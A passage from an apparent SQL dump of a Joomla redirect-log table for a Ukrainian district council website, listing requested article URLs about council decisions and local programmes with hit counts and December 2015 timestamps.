00:00:00',301),(23299,'http://malyn-rayrada.org.ua/index.php/1211-vitaemo-z-dnem-vchitelya','','','',18,0,'2015-12-29 19:35:08','0000-00-00 00:00:00',301),(23300,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1261-pro-rajonnu-programu-ozdorovlennya-teritoriji-malinskogo-rajonu-vid-skazu-na-2016-2020-roki','','','',9,0,'2015-12-29 19:35:14','0000-00-00 00:00:00',301),(23301,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1263-pro-rajonnu-programu-sotsialnoji-pidtrimki-ditej-simej-ta-molodi-na-2016-2020-roki','','','',9,0,'2015-12-29 19:35:14','0000-00-00 00:00:00',301),(23302,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1285-pro-peredachu-koshtiv-na-zdijsnennya-vidatkiv-na-utrimannya-silskikh-selishchnikh-zakladiv-kulturi-ta-silskikh-selishchnikh-doshkilnikh-zakladiv-osviti-u-2016-rotsi?tmpl=component&pr','','','',1,0,'2015-12-29 19:35:15','0000-00-00 00:00:00',301),(23303,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani/2014-09-22-17-50-18?page=2','','','',22,0,'2015-12-29 19:38:11','0000-00-00 00:00:00',301),(23304,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=779:2012-10-03-12-34-44&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 19:44:13','0000-00-00 00:00:00',301),(23305,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=319:-2009-2011-&Itemid=66&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 19:48:50','0000-00-00 00:00:00',301),(23306,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=693:2012-06-06-14-15-01&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 19:49:53','0000-00-00 00:00:00',301),(23307,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=659:-2011-&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 19:53:56','0000-00-00 00:00:00',301),(23308,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1140:80-1932-33-l-r&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 19:55:08','0000-00-00 00:00:00',301),(23309,'http://www.malyn-rayrada.org.ua/index.php?catid=41:--27042012-&id=664:-------------l-r-lr&Itemid=78&lang=en&option=com_content&view=article','','','',3,0,'2015-12-29 19:56:39','0000-00-00 00:00:00',301),(23310,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=763:2012-09-24-07-57-43&lang=en&option=com_content&view=article','','','',3,0,'2015-12-29 20:00:01','0000-00-00 00:00:00',301),(23311,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1098:2013-09-25-09-34-57&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 20:01:03','0000-00-00 00:00:00',301),(23312,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1084:--qq&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 20:03:23','0000-00-00 00:00:00',301),(23313,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=329:2011-05-20-16-25-10&Itemid=66&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 20:04:22','0000-00-00 00:00:00',301),(23314,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=701:-2011-2017-&Itemid=82&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 20:06:24','0000-00-00 00:00:00',301),(23315,'http://malyn-rayrada.org.ua/index.php/1105-vidnovleno-avtobusnij-marshrut?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-29 20:28:05','0000-00-00 00:00:00',301),(23316,'http://malyn-rayrada.org.ua/index.php/1107-umovi-spozhivchogo-kredituvannya-oshchadbankom-fizichnikh-osib-na-pridbannya-energozberigayuchogo-obladnannya-ta-materialiv','','','',6,0,'2015-12-29 20:28:07','0000-00-00 00:00:00',301),(23317,'http://malyn-rayrada.org.ua/index.php/1107-umovi-spozhivchogo-kredituvannya-oshchadbankom-fizichnikh-osib-na-pridbannya-energozberigayuchogo-obladnannya-ta-materialiv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-29 20:28:08','0000-00-00 00:00:00',301),(23318,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/dinak-92','','','',6,0,'2015-12-29 20:28:23','0000-00-00 00:00:00',301),(23319,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-3-3','','','',8,0,'2015-12-29 20:28:25','0000-00-00 00:00:00',301),(23320,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-7-7','','','',8,0,'2015-12-29 20:28:26','0000-00-00 00:00:00',301),(23321,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/130713-8-128','','','',8,0,'2015-12-29 20:28:28','0000-00-00 00:00:00',301),(23322,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-81','','','',8,0,'2015-12-29 20:28:30','0000-00-00 00:00:00',301),(23323,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/venglivskie11-123','','','',8,0,'2015-12-29 20:28:31','0000-00-00 00:00:00',301),(23324,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0882-8-102','','','',8,0,'2015-12-29 20:28:33','0000-00-00 00:00:00',301),(23325,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0934-12-106','','','',8,0,'2015-12-29 20:28:34','0000-00-00 00:00:00',301),(23326,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0954-13-100','','','',6,0,'2015-12-29 20:28:36','0000-00-00 00:00:00',301),(23327,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/786-1-16-kubku-zhitomirskoi-oblasti','','','',13,0,'2015-12-29 20:28:51','0000-00-00 00:00:00',301),(23328,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/786-1-16-kubku-zhitomirskoi-oblasti?tmpl=component&print=1&layout=default&page=','','','',13,0,'2015-12-29 20:28:53','0000-00-00 00:00:00',301),(23329,'http://malyn-rayrada.org.ua/index.php/552-u-fedorivci-rozpochali-robotu-po-navedennju?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-29 20:29:48','0000-00-00 00:00:00',301),(23330,'http://malyn-rayrada.org.ua/index.php/554-rekonstrukcii-stadionu-avangard-buti','','','',3,0,'2015-12-29 20:29:51','0000-00-00 00:00:00',301),(23331,'http://malyn-rayrada.org.ua/index.php/570-ogoloshennja_6','','','',3,0,'2015-12-29 20:30:01','0000-00-00 00:00:00',301),(23332,'http://malyn-rayrada.org.ua/index.php/575-vidbulas-22-sesija-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-29 20:30:03','0000-00-00 00:00:00',301),(23333,'http://malyn-rayrada.org.ua/index.php/818-informacija-pro-rezultati-konkursu-shhodo-vidboru?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-29 20:31:21','0000-00-00 00:00:00',301),(23334,'http://malyn-rayrada.org.ua/index.php/821-vidbuvsja-viiznij-seminar?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-29 20:31:25','0000-00-00 00:00:00',301),(23335,'http://malyn-rayrada.org.ua/index.php/component/acepolls/poll/1-perevibori-zminyat-situatsiyu-v-krajini','','','',14,0,'2015-12-29 20:31:45','0000-00-00 00:00:00',301),(23336,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1146:2013-11-27-10-09-00&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-29 20:33:07','0000-00-00 00:00:00',301),(23337,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1121:-24-6-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 20:34:07','0000-00-00 00:00:00',301),(23338,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/51-pro-pogodzhennja-klopotannja-shhodo-otrimannja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-29 20:35:57','0000-00-00 00:00:00',301),(23339,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/53-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-29 20:35:59','0000-00-00 00:00:00',301),(23340,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/293-pro-zamishhennja-deputata-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-29 20:36:26','0000-00-00 00:00:00',301),(23341,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/146-pro-peredachu-kotelni?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-29 20:37:58','0000-00-00 00:00:00',301),(23342,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/689-pro-zatverdzhennja-pereliku-zakladiv-kulturi','','','',4,0,'2015-12-29 20:38:20','0000-00-00 00:00:00',301),(23343,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/155-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-29 20:38:36','0000-00-00 00:00:00',301),(23344,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/24-pro-zatverdzhennja-programi-reformuvannja-i?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-29 20:38:42','0000-00-00 00:00:00',301),(23345,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/36-pro-klopotannja-shhodo-pripinennja-prava?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-29 20:38:48','0000-00-00 00:00:00',301),(23346,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/50-pro-peredachu-knigi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-29 20:38:50','0000-00-00 00:00:00',301),(23347,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=443:-2011-&Itemid=72&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 20:39:08','0000-00-00 00:00:00',301),(23348,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/131-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-29 20:40:18','0000-00-00 00:00:00',301),(23349,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/180-pro-zvernennja-deputativ-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-29 20:40:20','0000-00-00 00:00:00',301),(23350,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1069:23--------&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 20:50:23','0000-00-00 00:00:00',301),(23351,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1150:2013-11-28-14-53-17&Itemid=95&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-29 20:53:09','0000-00-00 00:00:00',301),(23352,'http://www.malyn-rayrada.org.ua/index.php?catid=32:2011-03-31-12-03-04&id=854:2012-12-11-13-40-55&Itemid=64&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 20:55:13','0000-00-00 00:00:00',301),(23353,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=867:2012-12-14-10-13-30&Itemid=85&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 20:56:52','0000-00-00 00:00:00',301),(23354,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=777:2012-10-02-10-06-36&Itemid=84&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 20:58:51','0000-00-00 00:00:00',301),(23355,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=763:2012-09-24-07-57-43&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 21:00:26','0000-00-00 00:00:00',301),(23356,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1061:2013-07-29-08-58-16&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 21:01:09','0000-00-00 00:00:00',301),(23357,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/833-pro-pidtrimku-vijskovosluzhbovciv-zhiteliv?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-29 21:07:42','0000-00-00 00:00:00',301),(23359,'http://www.malyn-rayrada.org.ua/index.php/593-ogoloshennja_8?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-29 21:20:10','0000-00-00 00:00:00',301),(23360,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1056:-22-&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 21:22:14','0000-00-00 00:00:00',301),(23361,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=747:2012-08-03-09-21-28&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 21:23:00','0000-00-00 00:00:00',301),(23362,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1096:2013-09-24-13-34-16&Itemid=94&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 21:23:48','0000-00-00 00:00:00',301),(23363,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=766:2012-09-28-08-37-31&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 21:24:36','0000-00-00 00:00:00',301),(23364,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=313:-2011-2015-&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 21:28:51','0000-00-00 00:00:00',301),(23365,'http://www.malyn-rayrada.org.ua/index.php?id=43:--25072012-&Itemid=82&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-29 21:29:32','0000-00-00 00:00:00',301),(23366,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1078:-2007-2015-&Itemid=94&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 21:30:15','0000-00-00 00:00:00',301),(23367,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=851:-2013-&Itemid=85&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 21:31:35','0000-00-00 00:00:00',301),(23368,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1035:2013-06-25-09-55-31&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 21:33:37','0000-00-00 00:00:00',301),(23369,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=816:2012-11-14-16-33-01&Itemid=84&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 21:41:31','0000-00-00 00:00:00',301),(23370,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=692:-2012&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 21:45:41','0000-00-00 00:00:00',301),(23371,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=218:2010-12-21-06-45-54&Itemid=16&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 21:46:18','0000-00-00 00:00:00',301),(23372,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1034:2013-06-23-15-11-25&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 21:48:19','0000-00-00 00:00:00',301),(23373,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1137:2013-11-15-13-07-04&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 21:48:56','0000-00-00 00:00:00',301),(23374,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1094:2013-09-24-05-02-52&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 21:55:31','0000-00-00 00:00:00',301),(23375,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=448:-2011-2012-&Itemid=73&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 21:57:28','0000-00-00 00:00:00',301),(23376,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=834:-20-&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 22:03:48','0000-00-00 00:00:00',301),(23377,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1048:2013-07-10-05-53-06&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 22:09:45','0000-00-00 00:00:00',301),(23378,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=208:2010-12-15-14-26-03&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 22:10:42','0000-00-00 00:00:00',301),(23379,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1099:-l-r&Itemid=94&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 22:10:56','0000-00-00 00:00:00',301),(23380,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/pochesni-gromadyani-rajonu/2014-09-22-17-49-27','','','',4,0,'2015-12-29 22:11:08','0000-00-00 00:00:00',301),(23381,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=998:1&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 22:11:25','0000-00-00 00:00:00',301),(23382,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=486:-l-28r&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 22:11:57','0000-00-00 00:00:00',301),(23383,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=792:2012-10-17-06-26-37&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 22:12:32','0000-00-00 00:00:00',301),(23384,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1282:-30-6-&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 22:13:04','0000-00-00 00:00:00',301),(23385,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=907:2013-01-21-08-54-59&Itemid=86&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 22:13:36','0000-00-00 00:00:00',301),(23386,'http://www.malyn-rayrada.org.ua/index.php?catid=55:--26122013-&id=1168:2014-01-08-07-14-14&Itemid=96&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 22:14:47','0000-00-00 00:00:00',301),(23387,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=749:2012-08-24-05-59-17&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-29 22:15:18','0000-00-00 00:00:00',301),(23388,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=568:-2011-&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 22:17:00','0000-00-00 00:00:00',301),(23389,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=310:-2011-&Itemid=66&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 22:18:52','0000-00-00 00:00:00',301),(23390,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1261:2014-03-31-11-35-31&Itemid=17&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 22:27:35','0000-00-00 00:00:00',301),(23391,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=842:2012-12-10-13-55-57&Itemid=85&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 22:40:23','0000-00-00 00:00:00',301),(23392,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1073:2013-08-30-11-12-19&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 22:42:15','0000-00-00 00:00:00',301),(23393,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=954:-19-6-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 22:42:40','0000-00-00 00:00:00',301),(23394,'http://www.malyn-rayrada.org.ua/index.php?id=38:--19122011-&Itemid=73&lang=ru&layout=blog&limitstart=25&option=com_content&view=category','','','',2,0,'2015-12-29 22:43:04','0000-00-00 00:00:00',301),(23395,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=924:2013-02-20-19-06-08&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 22:43:23','0000-00-00 00:00:00',301),(23396,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1007:-4-&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-29 22:44:32','0000-00-00 00:00:00',301),(23397,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=621:-2012-&Itemid=77&lang=en&option=com_content&view=article','','','',6,0,'2015-12-29 22:44:56','0000-00-00 00:00:00',301),(23398,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=717:2012-06-14-15-22-29&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 22:46:03','0000-00-00 00:00:00',301),(23399,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1084:-qq&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 22:46:21','0000-00-00 00:00:00',301),(23400,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1161:2013-12-18-13-34-32&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 22:46:45','0000-00-00 00:00:00',301),(23401,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=643:-6-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 22:47:07','0000-00-00 00:00:00',301),(23402,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=552:2012-01-26-12-47-12&Itemid=76&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-29 22:48:42','0000-00-00 00:00:00',301),(23403,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=912:2013-01-22-14-14-06&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 23:03:51','0000-00-00 00:00:00',301),(23404,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1085:2013-09-11-12-15-54&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 23:04:14','0000-00-00 00:00:00',301),(23405,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=591:2012-02-27-14-31-33&Itemid=77&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 23:04:35','0000-00-00 00:00:00',301),(23406,'http://www.malyn-rayrada.org.ua/index.php?catid=4:2010-06-05-12-51-18&id=4:--1062010&Itemid=8&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-29 23:05:15','0000-00-00 00:00:00',301),(23407,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=696:-14-6-&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 23:06:28','0000-00-00 00:00:00',301),(23408,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1162:2013-12-19-06-13-29&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-29 23:07:05','0000-00-00 00:00:00',301),(23409,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1013:2013-06-01-03-58-38&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 23:09:00','0000-00-00 00:00:00',301),(23410,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1079:------l---2011-2013-r&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 23:09:09','0000-00-00 00:00:00',301),(23411,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1171:2014-01-11-09-58-40&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-29 23:09:36','0000-00-00 00:00:00',301),(23412,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1259-pro-rajonnu-programu-vidpochinku-ta-ozdorovlennya-ditej-malinskogo-rajonu-na-2016-2020-roki?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-29 23:09:41','0000-00-00 00:00:00',301),(23413,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1261-pro-rajonnu-programu-ozdorovlennya-teritoriji-malinskogo-rajonu-vid-skazu-na-2016-2020-roki','','','',16,0,'2015-12-29 23:09:43','0000-00-00 00:00:00',301),(23414,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1266-pro-rajonnu-tsilovu-programu-roboti-iz-obdarovanoyu-moloddyu-na-2016-2018-roki','','','',28,0,'2015-12-29 23:09:47','0000-00-00 00:00:00',301),(23415,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1013:2013-06-01-03-58-38&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 23:09:48','0000-00-00 00:00:00',301),(23416,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1268-pro-deleguvannya-povnovazhen-malinskoji-rajonnoji-radi-malinskij-rajonnij-derzhavnij-administratsiji','','','',30,0,'2015-12-29 23:09:53','0000-00-00 00:00:00',301),(23417,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1276-pro-pidviz-uchniv-shcho-prozhivayut-v-s-liplyani-ta-s-gutyanske-i-dojizhdzhayut-do-chopovitskogo-znvk-gimnaziya-dnz-znz-i-iii-stupeniv-i-dodomu-shkilnim-avtobusom','','','',19,0,'2015-12-29 23:10:10','0000-00-00 00:00:00',301),(23418,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1278-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-yaka-peredaetsya-v-orendu-gr-beginu-v-m','','','',15,0,'2015-12-29 23:10:16','0000-00-00 00:00:00',301),(23419,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1287-pro-vstanovlennya-rozmiru-vartosti-kharchuvannya-ta-batkivskoji-plati-u-doshkilnikh-navchalnikh-zakladakh-na-2016-rik?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-29 23:10:23','0000-00-00 00:00:00',301),(23420,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1289-pro-perelik-investitsijnikh-proektiv-shcho-mozhut-realizovuvatis-za-rakhunok-koshtiv-derzhavnogo-fondu-regionalnogo-rozvitku','','','',16,0,'2015-12-29 23:10:25','0000-00-00 00:00:00',301),(23421,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1289-pro-perelik-investitsijnikh-proektiv-shcho-mozhut-realizovuvatis-za-rakhunok-koshtiv-derzhavnogo-fondu-regionalnogo-rozvitku?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-29 23:10:27','0000-00-00 00:00:00',301),(23422,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1294-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-29 23:10:29','0000-00-00 00:00:00',301),(23423,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1296-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-29 23:10:31','0000-00-00 00:00:00',301),(23424,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1253:pro-rajonnu-kompleksnu-programu-sotsialnoji-pidtrimki-uchasnikiv-antiteroristichnoji-operatsiji-ta-chleniv-jikh-simej-na-2016-2020-roki','','','',1,0,'2015-12-29 23:12:08','0000-00-00 00:00:00',301),(23425,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1254:pro-vnesennya-zmin-do-polozhennya-pro-teritorialnij-tsentr-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu','','','',1,0,'2015-12-29 23:12:10','0000-00-00 00:00:00',301),(23426,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1255:pro-programu-rozvitku-donorstva-krovi-ta-jiji-komponentiv-u-malinskomu-rajoni-na-2015-2018-roki','','','',9,0,'2015-12-29 23:12:12','0000-00-00 00:00:00',301),(23427,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1256:pro-kompleksnu-programu-pidtrimki-diyalnosti-komunalnoji-ustanovi-malinskij-rajonnij-trudovij-arkhiv-malinskoji-rajonnoji-radi-na-2016-2021roki','','','',1,0,'2015-12-29 23:12:15','0000-00-00 